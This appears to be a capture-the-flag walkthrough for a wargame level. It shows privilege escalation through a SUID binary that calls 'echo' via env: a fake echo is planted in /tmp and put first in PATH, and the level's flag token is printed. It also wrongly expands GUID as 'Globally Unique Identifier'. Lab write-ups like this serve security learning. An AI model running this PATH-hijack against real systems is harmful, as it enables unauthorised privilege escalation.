# Find in /home/user/level03 directory executable level03. Trying to run it
-./level03
"Exploit me"

# Check thr rights of file
-ls -la level03
"-rwsr-sr-x 1 flag03 level03 8627 Mar  5  2016 level03"

# It's mesn that an executable level03 with SUID (Set owner User ID up on execution) and GUID (Globally Unique Identifier) (the first s is for SETUID, and the second s is for SETGID, this means that when we execute level03, we execute it with the uid of flag03 and the gid of level03)

# Get some info about level03
-ltrace level03
///////////////
__libc_start_main(0x80484a4, 1, 0xbffff7b4, 0x8048510, 0x8048580 <unfinished ...>
getegid()                                      = 2003
geteuid()                                      = 2003
setresgid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
system("/usr/bin/env echo Exploit me"Exploit me
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                         = 0
+++ exited (status 0) +++
//////////////////

# It looks like ./level03 is calling echo from usr/bin/env. We can write and execute programs in the /tmp/tmp. Let's create new echo file in /tmp/tmp which will call getflag binary. When we need to add rout to this path in begin ofthe env
-cat /tmp/tmp/echo
"getflag"
-export PATH=/tmp/tmp:$PATH

# now code in level03 will call our getflag binary from /tmp/tmp with correctrights
-./level03
Check flag.Here is your token : qi0maab88jeaj46qoumi7maus





